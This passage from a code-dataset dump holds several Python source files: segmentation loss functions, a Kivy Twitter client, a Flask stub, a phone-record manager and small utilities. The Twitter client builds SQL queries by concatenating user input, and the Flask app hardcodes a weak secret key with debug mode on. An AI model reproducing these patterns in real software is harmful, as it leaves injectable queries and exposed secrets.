books]))\n\n\nprint('L.', round(sum([len(b['title']) for b in books]) / len(books)))\n","sub_path":"json-quiz/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"305275005","text":"from immutablecollections import immutableset\n\nENGLISH_DETERMINERS = immutableset([\"the\", \"a\"])\n\"\"\"\nThese are determiners we automatically add to the beginning of non-proper English noun phrases.\nThis is a language-specific hack since learning determiners is out of our scope:\nhttps://github.com/isi-vista/adam/issues/498\n\"\"\"\nENGLISH_BLOCK_DETERMINERS = immutableset([\"you\", \"me\", \"your\", \"my\"]).union(\n ENGLISH_DETERMINERS\n)\n\"\"\"\nThese words block the addition of the determiners above to English noun phrases.\n\"\"\"\n","sub_path":"adam/language_specific/english/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"423973707","text":"import flask\r\n\r\napp = flask.Flask(__name__)\r\n\r\n@app.errorhandler(404)\r\ndef page_not_found(e):\r\n return flask.render_template('404.html'), 404\r\n\r\nimport views.main\r\n\r\nmain = views.main.Main.as_view('main')\r\napp.add_url_rule('/', view_func=main)\r\n\r\napp.secret_key = 'top_secret'\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513772727","text":"# -*- coding: utf-8 -*-#\n# -------------------------------------------------------------------------------\n# Name: binaray_loss\n# Description: 此文件返回loss\n# 支持 focal diceloss softdice lovaz Jacardloss\n# Author: Administrator\n# Date: 2021/5/20\n# -------------------------------------------------------------------------------\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.autograd import Variable\ntry:\n from itertools import ifilterfalse\nexcept ImportError: # py3k\n from itertools import filterfalse as ifilterfalse\nimport numpy as np\n\n######################################################################\n# Focal loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# Paper HeKaiming\n\n\nclass FocalLoss(nn.Module):\n def __init__(self, weight=None, size_average=True,ALPHA = 0.8,GAMMA = 2):\n super(FocalLoss, self).__init__()\n self.alpha = ALPHA\n self.gamma = GAMMA\n\n def forward(self, inputs, targets, Open_Sigmoid = True):\n \"\"\"\n\n :param inputs:\n :param targets:\n :param Open_Sigmoid: True: will do sigmoid in forward\n False: not do sigmoid\n :return:\n \"\"\"\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n # first compute binary cross-entropy\n BCE = F.binary_cross_entropy(inputs, targets, reduction='mean')\n BCE_EXP = torch.exp(-BCE)\n focal_loss = self.alpha * (1 - BCE_EXP) ** self.gamma * BCE\n\n return focal_loss\n\n\n######################################################################\n# Dice loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# This is a very common metric on biomedical use\n# PyTorch\nclass DiceLoss(nn.Module):\n def __init__(self, weight=None, size_average=True):\n super(DiceLoss, self).__init__()\n\n def forward(self, inputs, targets, smooth=1,Open_Sigmoid = True):\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n intersection = (inputs * targets).sum()\n dice = (2. * intersection + smooth) / (inputs.sum() + targets.sum() + smooth)\n\n return 1 - dice\n\n\n######################################################################\n# BCEDICE loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# In somtimes: Diceloss is not stable. Often we mix dice and bce\n# PyTorch\n\nclass DiceBCELoss(nn.Module):\n def __init__(self, weight=None, size_average=True):\n super(DiceBCELoss, self).__init__()\n\n def forward(self, inputs, targets, smooth=1,Open_Sigmoid = True,alpha = 0.5):\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n intersection = (inputs * targets).sum()\n dice_loss = 1 - (2. * intersection + smooth) / (inputs.sum() + targets.sum() + smooth)\n BCE = F.binary_cross_entropy(inputs, targets, reduction='mean')\n Dice_BCE = alpha * BCE + (1- alpha) * dice_loss\n\n return Dice_BCE\n\n\n######################################################################\n# Jaccard or ioU loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# In somtimes: This loss is very often used in Natural Image Segmentation\n# PyTorch\n\nclass IoULoss(nn.Module):\n def __init__(self, weight=None, size_average=True):\n super(IoULoss, self).__init__()\n\n def forward(self, inputs, targets, smooth=1,Open_Sigmoid = True):\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n # intersection is equivalent to True Positive count\n # union is the mutually inclusive area of all labels & predictions\n intersection = (inputs * targets).sum()\n total = (inputs + targets).sum()\n union = total - intersection\n\n IoU = (intersection + smooth) / (union + smooth)\n\n return 1 - IoU\n\n\n######################################################################\n# Tversky loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# in the case of α=β=0.5 the Tversky index simplifies to be the same as\n# the Dice coefficient, which is also equal to the F1 score.\n# With α=β=1, Equation 2 produces Tanimoto coefficient,\n# and setting α+β=1 produces the set of Fβ scores.\n# Larger βs weigh recall higher than precision (by placing more emphasis on false negatives).\n# PyTorch\nALPHA = 0.5\nBETA = 0.5\n\n\nclass TverskyLoss(nn.Module):\n def __init__(self, weight=None, size_average=True):\n super(TverskyLoss, self).__init__()\n\n def forward(self, inputs, targets, smooth=1, alpha=ALPHA, beta=BETA,Open_Sigmoid = True):\n # comment out if your model contains a sigmoid or equivalent activation layer\n if Open_Sigmoid:\n inputs = torch.sigmoid(inputs)\n\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n # True Positives, False Positives & False Negatives\n TP = (inputs * targets).sum()\n FP = ((1 - targets) * inputs).sum()\n FN = (targets * (1 - inputs)).sum()\n\n Tversky = (TP + smooth) / (TP + alpha * FP + beta * FN + smooth)\n\n return 1 - Tversky\n\n\n######################################################################\n# Lovaz Hinge loss\n# Copy from https://www.kaggle.com/bigironsphere/loss-function-library-keras-pytorch\n# for semantic segmentation, particularly for multi- class instances.Specifically,\n# it sorts predictions by their error before calculating cumulatively how\n# each error affects the IoU score.\n# Stolen from https://github.com/bermanmaxim/LovaszSoftmax/blob/master/pytorch/lovasz_losses.py\n# 对错误进行了基于Pytorch的修正 理论上应该没有问题,但是实际使用可能会在反向传播时失效\nclass LovaszBinarayLoss(nn.Module):\n def __init__(self):\n super(LovaszBinarayLoss, self).__init__()\n\n def forward(self,logits,labels,per_image=True, ignore=None):\n \"\"\"\n Binary Lovasz hinge loss\n logits: [B, H, W] Variable, logits at each pixel (between -\\infty and +\\infty)\n labels: [B, H, W] Tensor, binary ground truth masks (0 or 1)\n per_image: compute the loss per image instead of per batch\n ignore: void class id\n \"\"\"\n if per_image:\n loss = LovaszBinarayLoss.mean(self.lovasz_hinge_flat(*self.flatten_binary_scores(log.unsqueeze(0), lab.unsqueeze(0), ignore))\n for log, lab in zip(logits, labels))\n else:\n loss = self.lovasz_hinge_flat(*self.flatten_binary_scores(logits, labels, ignore))\n return loss\n\n # --------------------------- BINARY LOSSES ---------------------------\n\n def lovasz_hinge_flat(self,logits, labels):\n \"\"\"\n Binary Lovasz hinge loss\n logits: [P] Variable, logits at each prediction (between -\\infty and +\\infty)\n labels: [P] Tensor, binary ground truth labels (0 or 1)\n ignore: label to ignore\n \"\"\"\n if len(labels) == 0:\n # only void pixels, the gradients should be 0\n return logits.sum() * 0.\n signs = 2. * labels.float() - 1.\n errors = (1. - logits * Variable(signs))\n errors_sorted, perm = torch.sort(errors, dim=0, descending=True)\n perm = perm.data\n gt_sorted = labels[perm]\n grad = self.lovasz_grad(gt_sorted)\n loss = torch.dot(F.relu(errors_sorted), Variable(grad))\n return loss\n\n def flatten_binary_scores(self,scores, labels, ignore=None):\n \"\"\"\n Flattens predictions in the batch (binary case)\n Remove labels equal to 'ignore'\n \"\"\"\n scores = scores.view(-1)\n labels = labels.view(-1)\n if ignore is None:\n return scores, labels\n valid = (labels != ignore)\n vscores = scores[valid]\n vlabels = labels[valid]\n return vscores, vlabels\n\n # --------------------------- HELPER FUNCTIONS ---------------------------\n @staticmethod\n def lovasz_grad(gt_sorted):\n \"\"\"\n Computes gradient of the Lovasz extension w.r.t sorted errors\n See Alg. 1 in paper\n \"\"\"\n p = len(gt_sorted)\n gts = gt_sorted.sum()\n intersection = gts - gt_sorted.float().cumsum(0)\n union = gts + (1 - gt_sorted).float().cumsum(0)\n jaccard = 1. - intersection / union\n if p > 1: # cover 1-pixel case\n jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]\n return jaccard\n\n @staticmethod\n def isnan(x):\n return x != x\n\n @staticmethod\n def mean(l, ignore_nan=False, empty=0):\n \"\"\"\n nanmean compatible with generators.\n \"\"\"\n l = iter(l)\n if ignore_nan:\n l = ifilterfalse(LovaszBinarayLoss.isnan, l)\n try:\n n = 1\n acc = next(l)\n except StopIteration:\n if empty == 'raise':\n raise ValueError('Empty mean')\n return empty\n for n, v in enumerate(l, 2):\n acc += v\n if n == 1:\n return acc\n return acc / n\n\n\ndef check_all_losses_run():\n label = torch.ones(size=[2, 1, 3, 4]) # 假设有一个 3*4 的全1 的label标记\n logits_1 = torch.randn(size=[2, 1, 3, 4], requires_grad=True) # 假设网络输出的结果为二分类的 logits值\n logits_2 = logits_1 - 0.1\n logits_3 = logits_1 + 0.1\n # 测试 loss是否正确给定\n dicebce = DiceBCELoss()\n diceloss = DiceLoss()\n focalloss = FocalLoss()\n iouloss = IoULoss()\n lovazbinar = LovaszBinarayLoss()\n terverskay = TverskyLoss()\n\n\n loss_1 = dicebce(logits_1, label)\n loss_2 = dicebce(logits_2, label)\n loss_3 = dicebce(logits_3, label)\n print(\"dicebce:\", loss_1, loss_2, loss_3)\n\n loss_1 = diceloss(logits_1, label)\n loss_2 = diceloss(logits_2, label)\n loss_3 = diceloss(logits_3, label)\n print(\"diceloss:\", loss_1, loss_2, loss_3)\n\n loss_1 = focalloss(logits_1, label)\n loss_2 = focalloss(logits_2, label)\n loss_3 = focalloss(logits_3, label)\n print(\"focalloss:\", loss_1, loss_2, loss_3)\n\n loss_1 = iouloss(logits_1, label)\n loss_2 = iouloss(logits_2, label)\n loss_3 = iouloss(logits_3, label)\n print(\"iouloss:\", loss_1, loss_2, loss_3)\n\n loss_1 = lovazbinar(logits_1, label)\n loss_2 = lovazbinar(logits_2, label)\n loss_3 = lovazbinar(logits_3, label)\n print(\"lovazbinar:\", loss_1, loss_2, loss_3)\n\n loss_1 = terverskay(logits_1, label)\n loss_2 = terverskay(logits_2, label)\n loss_3 = terverskay(logits_3, label)\n print(\"terverskay:\", loss_1, loss_2, loss_3)\n\n\n\nif __name__ == '__main__':\n check_all_losses_run()\n\n\n","sub_path":"src/toolbox/loss_box/binaray_loss.py","file_name":"binaray_loss.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"288057263","text":"# coding:utf-8\nfrom __future__ import print_function\nimport oauth2 \nimport sys\nimport sqlite3\nimport twitter\nimport urllib\nimport webbrowser as web\nimport ast\nfrom contextlib import closing\nfrom contextlib import contextmanager\nfrom kivy.app import App\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.properties import ObjectProperty\nfrom kivy.config import Config\nfrom kivy.uix.button import Button\nimport configparser\nfrom kivy.core.window import Window\n\nConfig.set('input', 'mouse', 'mouse,disable_multitouch') \nconfig = configparser.ConfigParser()\nconfig.read('setting.ini')\n\ndef load_app_keys():\n return config['APPKEY']['CONSUMER_KEY'], config['APPKEY']['CONSUMER_SECRET']\n\ndef load_access_tokens():\n return config['ACCOUNT']['SELECTED_ACCESS_TOKEN_KEY'], config['ACCOUNT']['SELECTED_ACCESS_TOKEN_SECRET']\n \nclass SelectAccountScreen(BoxLayout, Screen):\n dbname = 'Account.db'\n infomation = ObjectProperty(None)\n account = ObjectProperty(None)\n ACS = ''\n\n def get_sql_data(self, search_sql, account_id):\n with closing(sqlite3.connect(dbname)) as conn:\n c = conn.cursor()\n search_sql = search_sql + '\"' + account_id + '\"';\n cur = c.execute(search_sql)\n ret = str(cur.fetchall())\n a = ret.split(\"'\")\n conn.close()\n return a[1]\n\n def get_access_token_key(self, account_id):\n search_sql = 'select oauth_token from users where screen_name='\n return self.get_sql_data(search_sql, account_id)\n \n def get_access_token_secret(self, account_id):\n search_sql = 'select oauth_token_secret from users where screen_name='\n return self.get_sql_data(search_sql, account_id)\n\n def set_account(self):\n try:\n print(\"Enter your Account ID : \", end=\"\")\n print(self.account.text)\n account_id = self.account.text\n #print(account_id)\n account_hit = False\n access_token_key = ''\n access_token_secret = ''\n #print(\"AAAA\")\n\n with closing(sqlite3.connect(dbname)) as conn:\n c = conn.cursor()\n search_sql = 'select * from users where screen_name='\n search_sql = search_sql + '\"' + account_id + '\"';\n cur = c.execute(search_sql)\n # if len(cur.fetchall()):\n account_hit = True\n access_token_key = self.get_access_token_key(account_id)\n access_token_secret = self.get_access_token_secret(account_id)\n # else:\n # account_hit = False\n conn.close()\n\n # if (account_hit == False):\n # print(\"Sorry, but the account is not registered\")\n # sys.exit()\n #print(\"AAAA\")\n\n section1 = 'ACCOUNT'\n config.set(section1, 'SELECTED_ACCOUNT_ID', account_id)\n config.set(section1, 'SELECTED_ACCESS_TOKEN_KEY', access_token_key)\n config.set(section1, 'SELECTED_ACCESS_TOKEN_SECRET', access_token_secret)\n with open('setting.ini', 'w') as file:\n config.write(file)\n \n #print(\"AAAA\")\n CK, CS = load_app_keys()\n ATK, ATS = load_access_tokens()\n #print(CK)\n api = twitter.Api(consumer_key=CK,\n consumer_secret=CS,\n access_token_key=ATK,\n access_token_secret=ATS\n )\n\n #api.PostUpdate(\"set Account\")\n self.infomation.text = account_id + \" is selected.\"\n except IndexError:\n print(\"IndexError\")\n self.infomation.text = \"The account is not registered.\"\n except KeyError:\n print(\"KeyError\")\n except ValueError:\n print(\"ValueError\")\n except NameError:\n print(\"NameError\")\n\nclass RegistAccountScreen(BoxLayout, Screen):\n oauth_data = ''\n number = ObjectProperty(None)\n #message = ObjectProperty(None)\n def get_request_token(self):\n CK, CS = load_app_keys()\n consumer = oauth2.Consumer(key=CK, secret=CS)\n client = oauth2.Client(consumer)\n response, content = client.request(\"https://api.twitter.com/oauth/request_token\", \"GET\")\n content = (content.decode())\n oauth_data = dict(urllib.parse.parse_qsl(content))\n # ex. oauth_data =\n # {'oauth_token_secret': 'Number and Alphabet',\n # 'oauth_token': 'Number and Alphabet',\n # 'oauth_callback_confirmed': 'true or false'}\n return oauth_data\n \n def get_access_token(self, oauth_token, oauth_verifier):\n CK, CS = load_app_keys()\n consumer = oauth2.Consumer(key=CK, secret=CS)\n token = oauth2.Token(oauth_token, oauth_verifier)\n client = oauth2.Client(consumer, token)\n response, content = client.request(\"https://api.twitter.com/oauth/access_token\", \"POST\", body=\"oauth_verifier={0}\".format(oauth_verifier))\n content = (content.decode())\n oauth_data = dict(urllib.parse.parse_qsl(content))\n # ex. oauth_data =\n # {'oauth_token_secret': 'Number and Alphabet',\n # 'user_id': 'Number',\n # 'x_auth_expires': 'Number',\n # 'oauth_token': 'Number-Number and Alphabet',\n # 'screen_name': 'Account ID'}\n return oauth_data\n \n def setup_account(self):\n oauth = self.get_request_token()\n #oauth_data = ast.literal_eval(oauth_data)\n # self.message.text=\"a\"\n # print(self.message.text)\n #print(oauth)\n url = \"https://api.twitter.com/oauth/authorize?oauth_token=\" + oauth['oauth_token']\n browser = web.get('\"/usr/bin/chromium-browser\" %s')\n browser.open(url)\n global oauth_data\n oauth_data = oauth\n \n def enter_pin(self):\n # PIN input\n try:\n global oauth_data\n print(\"Enter your PIN code : \")\n print(self.number.text)\n #oauth_verifier = input()\n oauth_verifier = self.number.text\n \n # parameter settings\n oauth_token = oauth_data['oauth_token']\n oauth_token_secret = oauth_data['oauth_token_secret'] \n oauth_data = self.get_access_token(oauth_token, oauth_verifier)\n\n # register account to DB \n dbname = 'Account.db'\n with closing(sqlite3.connect(dbname)) as conn:\n c = conn.cursor()\n search_sql = 'select * from users where screen_name='\n search_sql = search_sql + '\"' + oauth_data['screen_name'] + '\"'; \n #print(search_sql)\n cur = c.execute(search_sql)\n if len(cur.fetchall()):\n print(\"The account is already registered.\")\n msg = \"The account is already registered.\"\n else:\n insert_sql = 'insert into users (oauth_token_secret, user_id, x_auth_expires, oauth_token, screen_name) values (?,?,?,?,?)'\n account_data = (oauth_data['oauth_token_secret'],\n oauth_data['user_id'],\n oauth_data['x_auth_expires'],\n oauth_data['oauth_token'],\n oauth_data['screen_name']\n )\n c.execute(insert_sql, account_data)\n conn.commit()\n print(\"Account registration is completed.\")\n msg = \"Account registration is completed.\"\n conn.close()\n self.infomation.text = msg\n\n except KeyError:\n print(\"Error\")\n self.infomation.text = \"PIN code may be wrong\"\n\n except NameError:\n print(\"Error2\")\n self.infomation.text = \"Verify account on the browser\"\n\nclass TweetViewPane():\n\n def update_timeline(self):\n layout = GridLayout(cols=1, spacing=10, size_hint_y=None)\n\n layout.bind(minimum_height=layout.setter('height'))\n\n for i in range(10):\n btn = Button(text=str(i), size_hint_y=None, height=40)\n layout.add_widget(btn)\n self = ScrollView(pos_hint={'x': .5, 'y': .6}, size_hint=(None, None), size=(300, 200))\n self.add_widget(layout)\n print(self)\n print(\"aaa\")\n\n\n \n \nclass TimelineScreen(BoxLayout, Screen):\n #global infomation_message\n infomation = ObjectProperty(None)\n tweet_input_form = ObjectProperty(None)\n tweet_view = ObjectProperty(None)\n\n def update_timeline(self):\n TVP = TweetViewPane()\n TVP.update_timeline()\n # layout = GridLayout(cols=1, spacing=10, size_hint_y=None)\n # # Make sure the height is such that there is something to scroll.\n # layout.bind(minimum_height=layout.setter('height'))\n # for i in range(100):\n # btn = Button(text=str(i), size_hint_y=None, height=40)\n # layout.add_widget(btn)\n # root = ScrollView(pos_hint={'x': .3, 'y': .1}, size_hint=(.7, .7), size=(300, 200))\n # self.add_widget(layout)\n # print(\"aa\")\n\n \n\n \n def post_tweet(self): \n try:\n CK, CS = load_app_keys()\n ATK, ATS = load_access_tokens()\n tweet = self.tweet_input_form.text\n api = twitter.Api(consumer_key=CK,\n consumer_secret=CS,\n access_token_key=ATK,\n access_token_secret=ATS\n )\n api.PostUpdate(tweet)\n self.infomation.text = tweet + \" is tweeted.\"\n except twitter.error.TwitterError:\n print(\"Something Twitter Error\")\n\n except NameError:\n print(\"Error2\")\n self.infomation.text = \"Something error occurred\"\n # def update_timeline(self): \n # button = Button(text='My first button')\n # self.add_widget(button)\n \nclass ClientApp(App):\n def build(self):\n sm = ScreenManager()\n sm.add_widget(RegistAccountScreen(name='register'))\n sm.add_widget(SelectAccountScreen(name='select'))\n sm.add_widget(TimelineScreen(name='timeline'))\n return sm\n #return TimelineScreen()\n\n def on_enter(self, ti):\n print(\"on_enter[%s]\" % (ti.text))\n\nif __name__ == \"__main__\":\n dbname = 'Account.db'\n ClientApp().run()\n\n ######\n sys.exit()\n ######\n\n","sub_path":"tweetclient.py","file_name":"tweetclient.py","file_ext":"py","file_size_in_byte":10792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"537063027","text":"\"\"\"\nA dataclass is now created here to store information regarding mobiles\n\"\"\"\nimport json\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass Mobile:\n \"\"\"\n This is a dataclass that stores information regarding mobiles.\n It also handles insertion, deletion, update and deletion in smartphone_data.json\n file.\n \"\"\"\n name: str\n series: str\n camera_mp: int\n battery_ah: int\n cost: float\n manufacturer: str\n\n def __init__(self):\n self.name = ''\n self.manufacturer = ''\n self.camera_mp = 0\n self.battery_ah = 0\n self.cost = 0\n self.series = ''\n\n def writeData(self, name, manfac, camera_mp, battery_ah, series, cost):\n \"\"\"\n Method to enter data into a Mobile object\n \\nname: Name of mobile phone\n \\nmanfac: Manufacturer\n \\ncamera_mp: Value of Camera Resolution Megapixel\n \\nbattery_ah: mAH Value of Phone Batterys\n \\nseries: Phone series\n \\ncost: Cost of the phone\n \\nreturn: none\n \"\"\"\n self.name = name\n self.manufacturer = manfac\n self.camera_mp = camera_mp\n self.battery_ah = battery_ah\n self.series = series\n self.cost = cost\n\n @classmethod\n def getUserInput(cls):\n \"\"\"\n Takes user input for name, manufacturer, camera resolution (in MP) and Battery mAH Value\n \\nreturn: name, manufacturer, camera resolution, battery mAH Value\n \"\"\"\n nam = input(\"Enter phone name: \")\n manf = input(\"Enter manufacturer of phone: \")\n cam_mp = int(input(\"Enter megapixel value for camera: \"))\n batt_ah = int(input(\"Enter mAH value of battery: \"))\n return nam, manf, cam_mp, batt_ah\n\n def __str__(self):\n str1 = ''\n if self.name != '':\n str1 = \"Name: \" + self.name\n if self.manufacturer != '':\n str1 += \"\\nManufacturer: \" + self.manufacturer\n if self.camera_mp != '' and self.camera_mp != 0:\n str1 += \"\\nCamera MP: \" + str(self.camera_mp)\n if self.battery_ah != '' and self.battery_ah != 0:\n str1 += \"\\nBattery mAH: \" + str(self.battery_ah)\n if self.series != '':\n str1 += \"\\nSeries: \" + self.series\n if self.cost != '' and self.cost != 0:\n str1 += \"\\nCost: \" + str(self.cost)\n return str1\n\n @classmethod\n def writeFile(cls, mobile_list):\n \"\"\"\n Method that writes mobile_list data into the file smartphone_data.json\n \\nmobile_list: List of Mobile objects\n \\nreturn: none\n \"\"\"\n # f1 = open(\"smartphone_data.csv\", 'w', encoding='UTF-8', newline='')\n header = [\"Name\", \"Manufacturer\", \"Camera_mp\", \"Battery_ah\", \"Series\", \"Cost\"]\n # it1 = iter(header)\n m1 = []\n for ele in mobile_list:\n it1 = iter(header)\n it2 = iter([ele.name, ele.manufacturer, ele.camera_mp, ele.battery_ah, ele.series, ele.cost])\n dict1 = dict(zip(it1, it2))\n m1.append(dict1)\n # w1.writerow([item.name, item.manufacturer, item.camera_mp, item.battery_ah, item.series, item.cost])\n f1 = open(\"smartphone_data.json\", 'w', encoding='UTF-8')\n jsonString = json.dumps(m1, indent=2)\n f1.write(jsonString)\n f1.close()\n # print(\"File Written\\n\")\n # f1.close()\n\n @classmethod\n def readFile(cls):\n \"\"\"\n Reads the data present in file\n \\nreturn: List of mobile objects\n \"\"\"\n m1 = []\n f1 = open(\"smartphone_data.json\", 'r', encoding='UTF-8')\n data = json.load(f1)\n series_column = 4\n cost_column = 5\n k1 = 'Name'\n k2 = 'Manufacturer'\n k3 = 'Camera_mp'\n k4 = 'Battery_ah'\n k5 = 'Series'\n k6 = 'Cost'\n for item in data:\n m2 = Mobile()\n if len(item.keys()) == series_column:\n m2.writeData(item[k1], item[k2], item[k3], item[k4], '', '')\n elif len(item.keys()) == cost_column:\n m2.writeData(item[k1], item[k2], item[k3], item[k4], item[k5], '')\n else:\n m2.writeData(item[k1], item[k2], item[k3], item[k4], item[k5], item[k6])\n m1.append(m2)\n f1.close()\n return m1\n\n def addRowInFile(self):\n m1 = Mobile.readFile()\n header = [\"Name\", \"Manufacturer\", \"Camera_mp\", \"Battery_ah\", \"Series\", \"Cost\"]\n it1 = iter(header)\n it2 = iter([self.name, self.manufacturer, self.camera_mp, self.battery_ah, self.series, self.cost])\n dict1 = dict(zip(it1, it2))\n index = [index for index in range(len(m1)) if m1[index].name == self.name]\n if len(index) > 0:\n print(\"Error! Cannot add the record. Phone with this name already exists\")\n return\n with open(\"smartphone_data.json\", \"r+\", encoding='UTF-8') as file:\n data = json.load(file)\n data.append(dict1)\n file.seek(0)\n jsonString = json.dumps(data, indent=2)\n file.write(jsonString)\n print(\"File updated\")\n\n @classmethod\n def deleteRowInFile(cls):\n m1 = Mobile.readFile()\n name = input(\"Enter name of Phone which has to be deleted from file: \")\n index = [index for index in range(len(m1)) if m1[index].name == name]\n if len(index) == 0:\n print(\"No such phone name can be found\")\n return\n del m1[index[0]]\n Mobile.writeFile(m1)\n\n @classmethod\n def updateFile(cls):\n m1 = Mobile.readFile()\n name = input(\"Enter name of the phone for which the change has to be made: \")\n index = [index for index in range(len(m1)) if m1[index].name == name]\n if len(index) == 0:\n print(\"No such phone name can be found\")\n return\n print(\"Enter the value you wish to update:\"\n \"\\n 1 - Name\"\n \"\\n 2 - Manufacturer\"\n \"\\n 3 - Camera MP\"\n \"\\n 4 - Battery mAH\"\n \"\\n 5 - Cost\")\n ch = int(input(\"\\n Enter your choice: \"))\n if ch == 1:\n m1[index[0]].name = input(\"Enter new name for the phone: \")\n elif ch == 2:\n m1[index[0]].manufacturer = input(\"Enter name of Manufacturer \")\n elif ch == 3:\n m1[index[0]].camera_mp = int(input(\"Enter camera megapixel value: \"))\n elif ch == 4:\n m1[index[0]].battery_ah = int(input(\"Enter battery mAH value: \"))\n elif ch == 5:\n m1[index[0]].cost = float(input(\"Enter phone cost: \"))\n Mobile.writeFile(m1)\n\n @classmethod\n def searchFile(cls):\n \"\"\"\n Searches the file based on attributes\n \"\"\"\n m1 = Mobile.readFile()\n print(\"Enter the attribute based on which the search should occur:\"\n \"\\n 1 - Name\"\n \"\\n 2 - Manufacturer\"\n \"\\n 3 - Camera MP\"\n \"\\n 4 - Battery mAH\"\n \"\\n 5 - Series\")\n ch = int(input(\"Enter your choice: \"))\n if ch == 1:\n name = input(\"Enter name of Phone: \")\n index = [index for index in range(len(m1)) if m1[index].name == name]\n if len(index) == 0:\n print(\"No such phone name can be found\")\n return\n print(m1[index[0]])\n\n if ch == 2:\n manf = input(\"Enter manufacturer name: \")\n index = [index for index in range(len(m1)) if m1[index].manufacturer == manf]\n if len(index) == 0:\n print(\"Not found\")\n return\n for i in index:\n print(m1[i])\n print(\"\\n\")\n\n if ch == 3:\n cam_mp = input(\"Enter Camera Megapixel value: \")\n index = [index for index in range(len(m1)) if m1[index].camera_mp == cam_mp]\n if len(index) == 0:\n print(\"Not found\")\n return\n for i in index:\n print(m1[i])\n print(\"\\n\")\n\n if ch == 4:\n batt_ah = input(\"Enter Battery mAH Value: \")\n index = [index for index in range(len(m1)) if m1[index].battery_ah == batt_ah]\n if len(index) == 0:\n print(\"Not found\")\n return\n for i in index:\n print(m1[i])\n print(\"\\n\")\n\n if ch == 5:\n series1 = input(\"Enter phone series: \")\n index = [index for index in range(len(m1)) if m1[index].series == series1]\n if len(index) == 0:\n print(\"Not found\")\n return\n for i in index:\n print(m1[i])\n print(\"\\n\")\n","sub_path":"dataclass_Mobile.py","file_name":"dataclass_Mobile.py","file_ext":"py","file_size_in_byte":8706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"441389493","text":"L, C=map(int,(input().split()))\n\narr=list(input().split())\narr.sort()\ndef go(L,cur,cnt,i):\n if L==cnt:\n mo=0\n ja=0\n for j in cur:\n if j in ['a','e','i','o','u']:\n mo+=1\n else:\n ja+=1\n if mo>0 and ja>1:\n for j in cur:\n print(j,end='')\n print()\n return\n if C-cnt=C:\n return\n go(L,cur+arr[i:i+1],cnt+1,i+1)\n go(L,cur,cnt,i+1)\n\ngo(L,[],0,0)\n","sub_path":"암호 만들기.py","file_name":"암호 만들기.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631690119","text":"import argparse\n\nimport combine_helper as ch\nfrom combine_gui import Application, create_window\n\n\ndef setup_args():\n parser = argparse.ArgumentParser(\"combine.py\")\n parser.add_argument(\"pdf_folder\", type=str, \n help=\"folder containing pdf files\")\n parser.add_argument(\"outfile_name\", type=str, \n help=\"output pdf file name\")\n parser.add_argument(\"-w\", \"--window\", action=\"store_true\", dest=\"window\", \n help=\"start with GUI\")\n parser.add_argument(\"-m\", \"--monitor\", type=int, metavar=\"N\", dest=\"monitor\", default=-1, \n help=\"monitor source pdf folder every N seconds and automatically generate combined file.\")\n \n return parser\n\n\ndef run_window_mode(source_folder, output_file, monitor_delay):\n source_folder = None if source_folder == \"#\" else source_folder\n output_file = None if output_file == \"#\" else output_file\n monitor_delay = -1 if monitor_delay < 0 else monitor_delay\n\n window = create_window()\n app = Application(window, source_folder, output_file, monitor_delay)\n app.mainloop()\n window.destroy()\n\n\n# ====================================MAIN====================================\n#\nif __name__ == '__main__':\n argsparser = setup_args()\n args = argsparser.parse_args()\n\n try:\n if args.window:\n # launch window gui\n print(\"GUI\")\n run_window_mode(args.pdf_folder, args.outfile_name, args.monitor)\n else:\n if args.monitor:\n ch.monitorpdfs(args.pdf_folder, args.outfile_name, args.monitor)\n else:\n ch.combinepdfs(args.pdf_folder, args.outfile_name)\n except Exception as e:\n print(\"***ERROR*** {0}\".format(e))\n","sub_path":"combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"499377333","text":"\nfrom 